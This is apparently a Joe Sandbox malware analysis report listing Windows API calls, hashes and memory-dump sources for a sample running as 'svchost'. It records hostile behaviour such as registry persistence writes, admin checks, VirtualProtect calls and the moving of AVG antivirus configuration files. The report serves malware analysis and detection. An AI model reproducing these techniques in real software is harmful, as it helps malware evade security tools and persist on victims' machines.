                                                                                                                                                                                                              • Opcode Fuzzy Hash: ef3c5762321e6216d52af9466e6dec2fd26ee566b4045460f8085ea860fe8b82
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB21E73094036AEBDB218B68DC54BEE77E86F15304F140AA5DD9297780DBB089C4CFA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • UnmapViewOfFile.KERNEL32(?,00000000,00000000,?,?,026698B8,00000000,00000000,76F92F00,?,02653CFD,00000000,00000000,00000000,00000000,?), ref: 02668C37
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,?,00000000,00000000,?,?,026698B8,00000000,00000000,76F92F00,?,02653CFD,00000000,00000000,00000000,00000000), ref: 02668C57
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,026698B8,00000000,00000000,76F92F00,?,02653CFD,00000000,00000000,00000000,00000000), ref: 02668C68
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,?,00000000,00000000,?,?,026698B8,00000000,00000000,76F92F00,?,02653CFD,00000000,00000000,00000000,00000000), ref: 02668C81
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,026698B8,00000000,00000000,76F92F00,?,02653CFD,00000000,00000000,00000000,00000000), ref: 02668C92
                                                                                                                                                                                                                • Part of subcall function 02669680: GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 026696E6
                                                                                                                                                                                                                • Part of subcall function 02669680: HeapValidate.KERNEL32(00000000), ref: 026696ED
                                                                                                                                                                                                                • Part of subcall function 02669680: GetProcessHeap.KERNEL32(00000000,?), ref: 026696FA
                                                                                                                                                                                                                • Part of subcall function 02669680: HeapFree.KERNEL32(00000000), ref: 02669701
                                                                                                                                                                                                                • Part of subcall function 02669680: GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02669710
                                                                                                                                                                                                                • Part of subcall function 02669680: HeapValidate.KERNEL32(00000000), ref: 02669713
                                                                                                                                                                                                                • Part of subcall function 02669680: GetProcessHeap.KERNEL32(00000000,?), ref: 02669720
                                                                                                                                                                                                                • Part of subcall function 02669680: HeapFree.KERNEL32(00000000), ref: 02669723
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$HandleProcess$CloseFreeInformationValidate$FileUnmapView
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3732962355-0
                                                                                                                                                                                                              • Opcode ID: 365073d2c6e4f7b1204273270ddb34de37e5a9e6463b4fbc61897f7d39503065
                                                                                                                                                                                                              • Instruction ID: 9aba026a60ab2a3da7d81f04b6f94b4402b71b82b8a8aea0c01fe6890898c010
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 365073d2c6e4f7b1204273270ddb34de37e5a9e6463b4fbc61897f7d39503065
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF117F71543304EBE7208F79DA8C77EFBE9AF45604F60096DE889D3240E77499498650
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathFindFileNameA.SHLWAPI(?), ref: 026580CA
                                                                                                                                                                                                              • FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 02658108
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 02658123
                                                                                                                                                                                                              • FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 0265812A
                                                                                                                                                                                                              • Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 02658151
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 433761119-0
                                                                                                                                                                                                              • Opcode ID: fe5d7e2e42c18303a981e4d8c07879a1597142864bc5cb119eb6fb3c9aa1ee5f
                                                                                                                                                                                                              • Instruction ID: 1358269c27ecd285cbcf3021101375201f4c1b844441fbb7862e7643ff7b66a1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe5d7e2e42c18303a981e4d8c07879a1597142864bc5cb119eb6fb3c9aa1ee5f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2211513498032AEBDB21CB64DC54BEE77A8BF15308F144A95DD52A7780DB709AC4CFA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02646AB4
                                                                                                                                                                                                                • Part of subcall function 02646980: memset.MSVCRT ref: 026469A2
                                                                                                                                                                                                                • Part of subcall function 02646980: memset.MSVCRT ref: 026469C0
                                                                                                                                                                                                                • Part of subcall function 02646980: lstrcpynA.KERNEL32(?,?,00000104), ref: 026469DD
                                                                                                                                                                                                                • Part of subcall function 02646980: RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,?,?,?), ref: 02646A4D
                                                                                                                                                                                                                • Part of subcall function 02646980: RegSetValueExA.ADVAPI32(?,75775DDDa,00000000,00000001,?,00000104), ref: 02646A6F
                                                                                                                                                                                                                • Part of subcall function 02646980: RegCloseKey.ADVAPI32(?), ref: 02646A7D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02646AE4
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02646AE7
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02646AF4
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02646AF7
                                                                                                                                                                                                                • Part of subcall function 02646690: memset.MSVCRT ref: 026466B0
                                                                                                                                                                                                                • Part of subcall function 02646690: calloc.MSVCRT ref: 0264670F
                                                                                                                                                                                                                • Part of subcall function 02646690: exit.MSVCRT ref: 0264671F
                                                                                                                                                                                                                • Part of subcall function 02646690: calloc.MSVCRT ref: 02646729
                                                                                                                                                                                                                • Part of subcall function 02646690: exit.MSVCRT ref: 02646734
                                                                                                                                                                                                                • Part of subcall function 02646690: calloc.MSVCRT ref: 0264674F
                                                                                                                                                                                                                • Part of subcall function 02646690: exit.MSVCRT ref: 0264675C
                                                                                                                                                                                                                • Part of subcall function 02646690: calloc.MSVCRT ref: 02646766
                                                                                                                                                                                                                • Part of subcall function 02646690: exit.MSVCRT ref: 02646771
                                                                                                                                                                                                                • Part of subcall function 02646690: calloc.MSVCRT ref: 02646794
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: calloc$Heapexit$memset$Process$AdminCloseFreeOpenUserValidateValuelstrcpyn
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1728208919-0
                                                                                                                                                                                                              • Opcode ID: 3d79c5ba620315c7ce3f6504aef41b5096c6d826872fb9672cfbfc8acd7ad150
                                                                                                                                                                                                              • Instruction ID: a7149374c9c0740dc70377cfa1cecbd712ddea3903e1e2197a7a6c5c1ded87ee
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d79c5ba620315c7ce3f6504aef41b5096c6d826872fb9672cfbfc8acd7ad150
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2F0C23198222967CB206EA2EC08B8F7A5DEF82726F01952AF501D2140CFB5D0D0CAE5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,02658E9D,?,?,?,?,?,?), ref: 02647987
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 02647992
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0264799A
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 026479A5
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 026479AC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$AdminCreateDirectoryFolderMakePathSystemUser
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1233776721-0
                                                                                                                                                                                                              • Opcode ID: 651f00ef99eacdf8cc65ab71b27f5edeea39ad8f3668ce60aa98e48d6427be04
                                                                                                                                                                                                              • Instruction ID: c2d4949f2199ec3ef7b0898f115d3feee8b0c3a149c1f95714fa7abc43cb5c31
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 651f00ef99eacdf8cc65ab71b27f5edeea39ad8f3668ce60aa98e48d6427be04
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1ED01231A421107BD7231B31AC0C73E7B64BF49A05B8A1914F843E1240DF24C1519566
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402468
                                                                                                                                                                                                              • MoveFileA.KERNEL32(?,?), ref: 0040252F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFolderMovePath
                                                                                                                                                                                                              • String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
                                                                                                                                                                                                              • API String ID: 1404575960-1083204512
                                                                                                                                                                                                              • Opcode ID: a6917f6e4da9773d44f84d015a9f77c9b7ba1530eaea60a7d0f67c0c1847faf1
                                                                                                                                                                                                              • Instruction ID: 6a3b38723654ace9b65cd78b9e90850702c138762b68f8666c7e3f81cfb55a8f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a6917f6e4da9773d44f84d015a9f77c9b7ba1530eaea60a7d0f67c0c1847faf1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35215EB45042448FC719DF14EA98B92BBE1FB89300F1581B9DA88A73B2D6B0D944CF98
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,7750FFB0,?,?,?,?,?,02657967,00000000,?,00000000), ref: 026649AD
                                                                                                                                                                                                              • GetProcessTimes.KERNEL32(00000000,?,?,?,02657967,?,?,?,?,?,02657967,00000000,?,00000000), ref: 026649CA
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,02657967,00000000,?,00000000), ref: 026649E2
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,02657967,00000000), ref: 026649F3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleProcess$CloseInformationOpenTimes
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3228293703-0
                                                                                                                                                                                                              • Opcode ID: b6db2f0daf620dc017121836d6f6cac7ccca689b316115633a8feabb7902f8d4
                                                                                                                                                                                                              • Instruction ID: bdc7adfd6e99a4fcdfd56f8615ee942b5fa4528fb33f0986019ec4387eddb6d5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6db2f0daf620dc017121836d6f6cac7ccca689b316115633a8feabb7902f8d4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4411F1B1D41219ABCB10CF9AC8889FFFBFCFF98644F50825AE905A7200D7705655CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,75775CE0,?,?,0265E2F9,00000000), ref: 02647638
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,?,0265E2F9,00000000), ref: 02647647
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000001,?,00000000,?,?,0265E2F9,00000000), ref: 02647659
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,?,0265E2F9,00000000), ref: 02647669
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$LockPointerUnlockWrite
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3342219707-0
                                                                                                                                                                                                              • Opcode ID: 51547aba111065244b0ffe810ae56de501466ef7671b495b4ad5a55f6273af7f
                                                                                                                                                                                                              • Instruction ID: 780bf5224bc56ff914775c02bb773cacabf2453739e07e01b29db1a00d87c811
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51547aba111065244b0ffe810ae56de501466ef7671b495b4ad5a55f6273af7f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47F06D71641208BFE7209E65DC89FEF7BADEB49780F504125FA01DA180DB709A80C6B9
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02656CA0,00000000,00000000,00000000), ref: 026577D4
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 026577EC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 026577FD
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 02657805
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleThread$CloseCreateExitInformation
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4233414108-0
                                                                                                                                                                                                              • Opcode ID: 5d07fe238518051dab84043dede53680f032b0f98ed17046223e70692c473013
                                                                                                                                                                                                              • Instruction ID: 60db20c114699aea4f4c8fe9b48c5f182bf1a8a5d5fd786d73c427c390b0dccc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d07fe238518051dab84043dede53680f032b0f98ed17046223e70692c473013
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5EE09B30AC6324B7F72287D0CD0EF6E7A6C9F00B05F910114FD01A51C0D7E46900C6A5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,6F9690B0,02650C69), ref: 026541BE
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 026541C1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 026541CE
                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000), ref: 026541D1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1670920773-0
                                                                                                                                                                                                              • Opcode ID: 413a300b7a274e6f614fd74b1485e77051c3c32d1843bc37f4157a7d91f60c95
                                                                                                                                                                                                              • Instruction ID: f969d7acc86b1d6e8400dc9164ce7ae82e3deb2aec72641a0bd3edee157230c4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 413a300b7a274e6f614fd74b1485e77051c3c32d1843bc37f4157a7d91f60c95
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BDD0C76198516076D7702A766C0CF6F7D1CDFD5B51F575540F916A7184CF608090C5F1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02646C70: memset.MSVCRT ref: 02646CA1
                                                                                                                                                                                                                • Part of subcall function 02646C70: memset.MSVCRT ref: 02646CBF
                                                                                                                                                                                                                • Part of subcall function 02646C70: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,?,?,?,?,00000000), ref: 02646CDB
                                                                                                                                                                                                                • Part of subcall function 02646C70: RegQueryValueExA.KERNEL32(?,75775DDDa,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02646D02
                                                                                                                                                                                                                • Part of subcall function 02646C70: GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02646D7A
                                                                                                                                                                                                                • Part of subcall function 02646C70: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02646D81
                                                                                                                                                                                                                • Part of subcall function 02646C70: memset.MSVCRT ref: 02646D95
                                                                                                                                                                                                                • Part of subcall function 02646C70: lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02646DAE
                                                                                                                                                                                                                • Part of subcall function 02646C70: RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 02646DBC
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,76F90F10,00000000,0265A2D3), ref: 02654A88
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02654A8B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02654A98
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02654A9B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Processmemset$AllocCloseFreeOpenQueryValidateValuelstrcpyn
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 789118668-0
                                                                                                                                                                                                              • Opcode ID: cfc0d1f7d36f693417eee41bc545a72cdf41b81e959d3cf8c059c2bcfc05db06
                                                                                                                                                                                                              • Instruction ID: 0c6c6ea06cfe4cb6c208d26216346c729ebd8d3b5b5530d9a4703c0106e2f997
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cfc0d1f7d36f693417eee41bc545a72cdf41b81e959d3cf8c059c2bcfc05db06
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D012471B8A1205ADB644E7AAD6073EBB9EDF82150F4D1299FC46C738CEF21CC809358
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,00000000,?,00000000,?,?,02669223), ref: 02668CEF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                              • Opcode ID: 0dd971a67d660d92c9840a3567decdd3ea5ce5f843f588183f21525d1d29e230
                                                                                                                                                                                                              • Instruction ID: 14df515e94186e6571c2130fbd65f29100bb160ce58a6850a3a09d7a30e40550
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0dd971a67d660d92c9840a3567decdd3ea5ce5f843f588183f21525d1d29e230
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B11E972A01344ABD7209E7DA8C87BEFBECEB45269F50057FE949C3240C7715C448660
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,02650BF7,02650BE3,?,02658A25,?,?,?), ref: 02654181
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?), ref: 02654188
                                                                                                                                                                                                              • memset.MSVCRT ref: 02654198
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocateProcessmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 983300431-0
                                                                                                                                                                                                              • Opcode ID: 1b6c2dafd760786dcea6d60a9ce8f0c9e3fe743a648a825c106ff42f7d4a3549
                                                                                                                                                                                                              • Instruction ID: 38bbe76bbf9b45ee51f7723f2a03d69a4d38d38930c22360b625d10f1cee705d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b6c2dafd760786dcea6d60a9ce8f0c9e3fe743a648a825c106ff42f7d4a3549
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01E0CD7764152176DB21152A6C04B9F35199FC1631F164324FE05E63C0DF10C44941F1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 0265A4FE
                                                                                                                                                                                                              • SetThreadPriority.KERNEL32(00000000), ref: 0265A505
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(0265A660,00000008,00000000,0265A660), ref: 0265A51F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Thread$CurrentPriorityProtectVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1494777729-0
                                                                                                                                                                                                              • Opcode ID: 590fcb7c490f2bbe3566d25d77a4cd4cec3b3b8df96233500ab4132acbd08b63
                                                                                                                                                                                                              • Instruction ID: 4e8b84fba880c99c618f9c1fcce7bc2c0f4b3526842a4ef15b7b56e3f5d27b18
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 590fcb7c490f2bbe3566d25d77a4cd4cec3b3b8df96233500ab4132acbd08b63
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9CE065B6E40208EFCF00DFD8DC459ADB778FB48320F008649F955A7240C7749810CB60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004021AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                              • String ID: v-@
                                                                                                                                                                                                              • API String ID: 3664257935-4190885519
                                                                                                                                                                                                              • Opcode ID: b8aa73b41344c928b5a69aeafce1e5ea70d40f485a6ee08f666cda2b661d009f
                                                                                                                                                                                                              • Instruction ID: 659d1c44b33988b11b994a6559d152e96ecfdb185b9268fc6ed29e1105b0769f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8aa73b41344c928b5a69aeafce1e5ea70d40f485a6ee08f666cda2b661d009f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34D05E76E01629CBCB21DF94A5052AEF730FB44731F0043AADE247338083351C118AD5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
